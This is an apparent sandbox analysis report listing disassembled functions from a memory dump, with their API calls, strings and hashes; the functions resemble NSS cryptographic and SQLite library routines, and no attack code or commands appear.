
Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 90232027dec62fa97ad7081e7f2feff775d090902e9af0ac840835e8ba39f6f6
Instruction ID: c2ae9ec0107465fe5faef7c05a74442670385b51aa1fd216624183c5777536e3
Opcode Fuzzy Hash: 90232027dec62fa97ad7081e7f2feff775d090902e9af0ac840835e8ba39f6f6
Instruction Fuzzy Hash: B83186B5A00218AFEF20DF64DC49BAA7BB8FF49349F004169F61893211E7319AC4CF65

Function 6CA93D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA93DFB
__allrem.LIBCMT ref: 6CA93EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA93FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA94047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA940DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA9415F
__allrem.LIBCMT ref: 6CA9416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA94288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA942AB
__allrem.LIBCMT ref: 6CA942B7

Strings

%lld, xrefs: 6CA93FB2
%03d, xrefs: 6CA942E8
%04d, xrefs: 6CA9407B
%02d, xrefs: 6CA94086

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 7c13ac53aafd0829acbadaf23837f23652a14813d66335edd72175b183852769
Instruction ID: e03ffcdb33ec26f4b1940261cc40963f6f2e44aafbbb3ec800e435538e9299c5
Opcode Fuzzy Hash: 7c13ac53aafd0829acbadaf23837f23652a14813d66335edd72175b183852769
Instruction Fuzzy Hash: 5FF1F471A187409FD715CF38C882A6FB7F6AF85308F148A1DF4999BA51EB34D8858B42

Function 6CA9EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA9EF63

Part of subcall function 6CAA87D0: PORT_NewArena_Util.NSS3(00000800,6CA9EF74,00000000), ref: 6CAA87E8
Part of subcall function 6CAA87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CA9EF74,00000000), ref: 6CAA87FD
Part of subcall function 6CAA87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CAA884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CA9F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA9F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CA9F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CA9F374
PL_strcasecmp.NSS3(6CBE2FD4,?), ref: 6CA9F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CA9F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA9F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA9F67D
CERT_DestroyName.NSS3(?), ref: 6CA9F68B

Part of subcall function 6CAA8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CAA8338
Part of subcall function 6CAA8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CAA8364
Part of subcall function 6CAA8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CAA838E
Part of subcall function 6CAA8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CAA83A5
Part of subcall function 6CAA8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA83E3

Part of subcall function 6CAA84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CAA84D9
Part of subcall function 6CAA84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CAA8528

Part of subcall function 6CAA8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CAA8955

Strings

oid., xrefs: 6CA9F2CF
", xrefs: 6CA9F21B
*, xrefs: 6CA9F3C6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 9ce4392834f5263a0ebece54fe023f7467e55ca525abc1fcd6680203c8304253
Instruction ID: 0ea6835311f522aaf8bb0d7fcfd72de6383ce0e1fbf961e6c2b20b035ee56436
Opcode Fuzzy Hash: 9ce4392834f5263a0ebece54fe023f7467e55ca525abc1fcd6680203c8304253
Instruction Fuzzy Hash: 0A2238716283904BD714CE29CC923AAB7E6ABC5318F1C4A2EF59587B91E7319CC5C783

Function 6CA41C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA41D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA41EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CA41FB7

Strings

attached databases must use the same text encoding as main database, xrefs: 6CA420CA
no more rows available, xrefs: 6CA42264
unsupported file format, xrefs: 6CA42188
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CA41F83
another row available, xrefs: 6CA42287
abort due to ROLLBACK, xrefs: 6CA42223
sqlite_master, xrefs: 6CA41C61
table, xrefs: 6CA41C8B
unknown error, xrefs: 6CA42291
sqlite_temp_master, xrefs: 6CA41C5C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 87ed31112cdf92768c117fb2b6495a7ed289c7597af5554ad855098a6d0fd029
Instruction ID: 393d7239f7cbf2b630493c8d0f0eac3ba1d2c27c0ecc6dacde1d8ef02a0d610d
Opcode Fuzzy Hash: 87ed31112cdf92768c117fb2b6495a7ed289c7597af5554ad855098a6d0fd029
Instruction Fuzzy Hash: 0612C1706083418FD705CF19C484A6AB7F2BF85318F19C66DE9958BB52D731EC8ACB92

Function 6CA65F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

u, xrefs: 6CA681DA
2, xrefs: 6CA665B4
ON clause references tables to its right, xrefs: 6CA66BEC
sub-select returns %d columns - expected %d, xrefs: 6CA6805F
NOCASE, xrefs: 6CA68703
-, xrefs: 6CA662F9
BINARY, xrefs: 6CA68708, 6CA68737, 6CA687B8
-, xrefs: 6CA66228

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 3ec83653556f8a13c0c174a52afc83088deb3f305fa20e7350af2e662e365611
Instruction ID: a668a3ef321cd3be60716a532dab501b07b533e9de6ff4aba21651db82719d9b
Opcode Fuzzy Hash: 3ec83653556f8a13c0c174a52afc83088deb3f305fa20e7350af2e662e365611
Instruction Fuzzy Hash: E54384746183418FD304CF2AC590B5AB7E2BFC9318F19865DE899CBB51D731E886CB92

Function 6CB0EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB0C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CB0DAE2,?), ref: 6CB0C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB0F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB0F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CB0F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB0F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CBD218C), ref: 6CB0F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CB0F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB0F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CB0F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CB0F210

Part of subcall function 6CAB52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CB0F1E9,?,00000000,?,?), ref: 6CAB52F5
Part of subcall function 6CAB52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CAB530F
Part of subcall function 6CAB52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CAB5326
Part of subcall function 6CAB52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CB0F1E9,?,00000000,?,?), ref: 6CAB5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB0F227

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CB0F23E

Part of subcall function 6CAFBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CAAE708,00000000,00000000,00000004,00000000), ref: 6CAFBE6A
Part of subcall function 6CAFBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CAB04DC,?), ref: 6CAFBE7E
Part of subcall function 6CAFBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CAFBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB0F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CB0F3A8

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CB0F3B3

Part of subcall function 6CAB2D20: PK11_DestroyObject.NSS3(?,?), ref: 6CAB2D3C
Part of subcall function 6CAB2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAB2D5F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: ba56b55b6420997c213d8a33f8f9f1452d8f185acad1b218df0c7ef8c9a99b6d
Instruction ID: 9cc9f99f8f3b6f688b985885a25bfda483881e1300ba785555734686281714b2
Opcode Fuzzy Hash: ba56b55b6420997c213d8a33f8f9f1452d8f185acad1b218df0c7ef8c9a99b6d
Instruction Fuzzy Hash: 7ED19FB6F012459FDB04CFA9D880A9EBBF5FF48318F198029E915A7711EB31E806CB55

Function 6CB3DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6CB17FFA,00000000,?,6CB423B9,00000002,00000000,?,6CB17FFA,00000002), ref: 6CB3DE33

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

Part of subcall function 6CB3D000: PORT_ZAlloc_Util.NSS3(00000108,?,6CB3DE74,6CB17FFA,00000002,?,?,?,?,?,00000000,6CB17FFA,00000000,?,6CB423B9,00000002), ref: 6CB3D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6CB17FFA,00000000,?,6CB423B9,00000002,00000000,?,6CB17FFA,00000002), ref: 6CB3DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6CB3DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB3E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB3E121
PK11_FreeSymKey.NSS3(?), ref: 6CB3E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6CB3E195
PR_GetCurrentThread.NSS3 ref: 6CB3E1FC

Part of subcall function 6CB32460: PR_SetError.NSS3(FFFFE005,00000000,6CBD7379,00000002,?), ref: 6CB32493

Strings

key, xrefs: 6CB3E046
handshake data, xrefs: 6CB3DFF7
early application data, xrefs: 6CB3DFC9
application data, xrefs: 6CB3DFE0

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 7ca0a81a909984986b7a40e1eeffaa9b440fba945bd44d3570b3499f94eadda0
Instruction ID: 8aa784575cd83fc9926f0f5b0ff02256c4b12beb993886b4c9f8d9536b059bc0
Opcode Fuzzy Hash: 7ca0a81a909984986b7a40e1eeffaa9b440fba945bd44d3570b3499f94eadda0
Instruction Fuzzy Hash: 6EC1F471A406A59BDB04CF65DC80BEEB7B4FF05318F044129E90DABA91E335ED54CBA2

Function 6CA2ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA2EF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2F483
%s at line %d of [%.10s], xrefs: 6CA2F492
database corruption, xrefs: 6CA2F48D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 6f292aef9c102fd877684dc1a47f546099239b8c5068002c537148684c4f8ef7
Instruction ID: 14636d005fedc9f0fba696555cfea7e815f690fa4b771c2b575e0f11964b6f5c
Opcode Fuzzy Hash: 6f292aef9c102fd877684dc1a47f546099239b8c5068002c537148684c4f8ef7
Instruction Fuzzy Hash: CB62F270A042758FEB04CF64C980B9ABBB1BF45318F1C419DD855ABB92D779E8C6CB90

Function 6CACFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CACFD06

Part of subcall function 6CACF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CACF696
Part of subcall function 6CACF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CACF789
Part of subcall function 6CACF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CACF796
Part of subcall function 6CACF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CACF79F
Part of subcall function 6CACF670: SECITEM_DupItem_Util.NSS3 ref: 6CACF7F0

Part of subcall function 6CAF3440: PK11_GetAllTokens.NSS3 ref: 6CAF3481
Part of subcall function 6CAF3440: PR_SetError.NSS3(00000000,00000000), ref: 6CAF34A3
Part of subcall function 6CAF3440: TlsGetValue.KERNEL32 ref: 6CAF352E
Part of subcall function 6CAF3440: EnterCriticalSection.KERNEL32(?), ref: 6CAF3542
Part of subcall function 6CAF3440: PR_Unlock.NSS3(?), ref: 6CAF355B

SECITEM_DupItem_Util.NSS3(?), ref: 6CACFDAD

Part of subcall function 6CAFFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CAA9003,?), ref: 6CAFFD91
Part of subcall function 6CAFFD80: PORT_Alloc_Util.NSS3(A4686CB0,?), ref: 6CAFFDA2
Part of subcall function 6CAFFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB0,?,?), ref: 6CAFFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CACFE00

Part of subcall function 6CAFFD80: free.MOZGLUE(00000000,?,?), ref: 6CAFFDD1

Part of subcall function 6CAEE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAEE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACFEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6CACFEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CACFED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CACFF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CACFF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CACFF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CACFFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CAD0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CAD0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CAD0044

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 8e36c2df0d724b6e6d0908efdc96b71e19765a9334e8d4a28394b0705d8a5420
Instruction ID: 75dca62679a6a90eb9dd500e2c2adda72c76a117a208af514a9ed741baf05783
Opcode Fuzzy Hash: 8e36c2df0d724b6e6d0908efdc96b71e19765a9334e8d4a28394b0705d8a5420
Instruction Fuzzy Hash: 3AB1A471604301AFE704CF29CC41A6AB7E5FF88308F598A1DF99997A41E770E984CB92

Function 6CAC7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6CAC7DDC

Part of subcall function 6CB007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAA8298,?,?,?,6CA9FCE5,?), ref: 6CB007BF
Part of subcall function 6CB007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB007E6
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB0081B
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB00825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC7DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CAC7F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6CAC7F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CAC7F98
PK11_FreeSymKey.NSS3(?), ref: 6CAC7FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC7FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CAC8000

Part of subcall function 6CAE9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CAC7F0C,?,00000000,00000000,00000000,?), ref: 6CAE943B
Part of subcall function 6CAE9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CAE946B
Part of subcall function 6CAE9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CAE9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC8110
PK11_FreeSymKey.NSS3(00000000), ref: 6CAC811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CAC822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAC823C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 1e13aba1b9368b246ac258498e4bb1928aa6d3ee70b215aecfe18bc9cdeb2bca
Instruction ID: c2c0c555e6034cb756e033582fbdb162e12dd9ee4fd7e268113ed6a1027efa2a
Opcode Fuzzy Hash: 1e13aba1b9368b246ac258498e4bb1928aa6d3ee70b215aecfe18bc9cdeb2bca
Instruction Fuzzy Hash: B7C160B1E402599BEB21CF24CC44BEAB7B9BF05308F0481E5E91DA6641E7319EC9DF91

Function 6CAD0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CAD0F8D
